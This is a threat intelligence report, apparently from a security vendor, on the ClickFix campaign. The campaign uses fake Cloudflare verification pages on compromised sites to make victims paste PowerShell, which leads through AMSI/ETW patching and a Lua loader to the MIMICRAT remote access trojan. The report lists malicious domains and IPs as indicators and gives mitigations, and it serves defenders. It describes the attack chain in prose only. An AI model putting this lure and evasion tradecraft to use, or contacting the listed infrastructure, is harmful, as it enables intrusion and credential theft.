Executive Summary

The ClickFix campaign represents a significant escalation in the abuse of compromised legitimate websites to deliver advanced malware, culminating in the deployment of the custom MIMICRAT Remote Access Trojan. First identified by Elastic Security Labs and corroborated by multiple open-source intelligence channels, this campaign leverages a multi-stage infection chain, sophisticated defense evasion, and post-exploitation techniques that enable persistent access, credential theft, and covert network tunneling. The campaign’s global reach, targeting of higher education and financial sectors, and use of malleable command-and-control (C2) infrastructure underscore the urgent need for heightened vigilance and proactive defense measures across all organizations.

Threat Actor Profile

Attribution for the ClickFix campaign remains unconfirmed, but the operational sophistication, infrastructure reuse, and advanced tradecraft suggest a well-resourced and technically adept threat actor. The campaign’s use of multi-language lures, dynamic infrastructure, and custom malware tooling is consistent with tactics observed in advanced persistent threat (APT) operations. While no specific nation-state or criminal group has been definitively linked, the campaign’s targeting of universities, financial platforms, and global users indicates a broad operational mandate, likely motivated by both espionage and financial gain. The infrastructure and techniques overlap with those seen in other high-profile campaigns tracked by Huntress and Elastic Security Labs, suggesting either a shared toolkit or actor collaboration.

Technical Analysis of Malware/TTPs

The ClickFix campaign employs a multi-stage infection chain designed to maximize stealth and persistence while minimizing detection by traditional security controls.

Initial access is achieved through the compromise of legitimate websites such as bincheck.io and investonline.in, which serve as delivery infrastructure. Victims are presented with a fake Cloudflare verification page, the so-called "ClickFix" lure, which instructs them to copy a PowerShell command from their clipboard and execute it in a terminal. This method bypasses browser-based download protections and leverages user trust in familiar brands.

The infection chain unfolds as follows: The first stage is an obfuscated PowerShell one-liner, which connects to the attacker-controlled domain xMRi.neTwOrk (IP: 45.13.212.250) to retrieve the next payload. The second stage is a more advanced PowerShell script that disables Windows Event Tracing (ETW) and the Antimalware Scan Interface (AMSI), employing in-memory patching to evade endpoint detection and response (EDR) solutions. This script downloads and executes a ZIP archive containing a custom Lua loader.

The third stage involves the Lua loader decrypting and executing an embedded Lua script, which in turn decodes and runs shellcode directly in memory. The shellcode, consistent with Meterpreter-family loaders, reflectively loads the final payload: MIMICRAT.

MIMICRAT is a custom Remote Access Trojan featuring malleable HTTP(S) C2 profiles, Windows token theft and impersonation, SOCKS5 proxy tunneling, and a 22-command dispatch table for post-exploitation. The malware is capable of lateral movement, credential harvesting, and establishing persistent, encrypted channels for data exfiltration and remote control.

The campaign’s technical sophistication is further evidenced by its use of Amazon CloudFront as a C2 relay, dynamic language localization in lures (supporting 17 languages), and the abuse of both compromised and attacker-controlled infrastructure for payload delivery and C2.

Exploitation in the Wild

The ClickFix campaign has been observed targeting a diverse set of victims, including a confirmed US-based university, Chinese-speaking users, and visitors to compromised financial platforms. The use of legitimate, high-traffic websites as delivery vectors increases the likelihood of successful infections and complicates attribution and remediation efforts.

Infection telemetry and open-source reporting indicate that the campaign remains active, with new infrastructure and payload variants appearing regularly. The clipboard-based PowerShell execution technique is particularly effective at bypassing traditional web and email security controls, as it relies on user action rather than automated download or execution.

The campaign’s post-exploitation activities include credential theft via Windows token impersonation, establishment of SOCKS5 proxies for covert network tunneling, and the use of malleable C2 profiles to blend malicious traffic with legitimate web communications. These capabilities enable the threat actor to maintain persistent access, move laterally within victim environments, and exfiltrate sensitive data with minimal risk of detection.

Victimology and Targeting

Analysis of available telemetry and public reporting suggests that the ClickFix campaign is opportunistic but exhibits a preference for high-value targets. Sectors affected include higher education (notably universities), financial services (via compromised investment platforms), and general internet users across multiple geographies.

The campaign’s use of multi-language lures and global infrastructure indicates a broad targeting scope, with confirmed victims in the United States, India, and China. The reliance on user interaction (copying and executing PowerShell commands) suggests that the campaign is designed to exploit both technical and social vulnerabilities, increasing its effectiveness against a wide range of organizations and individuals.

Mitigation and Countermeasures

Organizations are strongly advised to implement the following countermeasures to mitigate the risk posed by the ClickFix campaign and MIMICRAT malware:

Network and endpoint security teams should block and monitor all indicators of compromise (IOCs) associated with the campaign, including the domains xMRi.neTwOrk, WexMrI.CC, www.ndibstersoft.com, and d15mawx0xveem1.cloudfront.net, as well as the IP addresses 45.13.212.250, 45.13.212.251, and 23.227.202.114. All URLs and file hashes listed in the IOCs section should be added to blocklists and monitored for access attempts.

Security operations centers should proactively hunt for PowerShell execution events with obfuscated command lines, especially those involving clipboard-based lures or suspicious network connections to the aforementioned infrastructure. Endpoint detection and response (EDR) solutions should be configured to alert on attempts to disable ETW or AMSI, as these are strong indicators of advanced malware activity.

Network monitoring should be enhanced to detect suspicious outbound HTTPS traffic to Amazon CloudFront and the listed C2 domains. Deep packet inspection and SSL/TLS interception may be necessary to identify and block malicious communications that leverage encrypted channels.

The provided YARA rule for MIMICRAT should be deployed across all endpoints and memory scanning solutions to facilitate early detection of the malware in both file and memory contexts.

User awareness training should emphasize the risks associated with executing commands copied from websites, even those purporting to be legitimate verification steps. Application whitelisting and the restriction of PowerShell execution to trusted administrators can further reduce the attack surface.

Regular review and hardening of AMSI and ETW configurations, as well as the implementation of least-privilege access controls, will help prevent successful defense evasion and privilege escalation by malware such as MIMICRAT.

References

Elastic Security Labs: MIMICRAT Analysis, The Hacker News: ClickFix Campaign Abuses Compromised Sites, Reddit: BlueTeamSec Discussion, LinkedIn: Aaron Payne's Post, MITRE ATT&CK: Technique Matrix, VirusTotal: Relations for IOCs

About Rescana

Rescana delivers next-generation Third-Party Risk Management (TPRM) solutions, empowering organizations to continuously monitor, assess, and mitigate cyber risks across their extended supply chain. Our platform leverages advanced threat intelligence, automation, and analytics to provide actionable insights and ensure robust cyber resilience. For questions or further information, we are happy to assist at ops@rescana.com.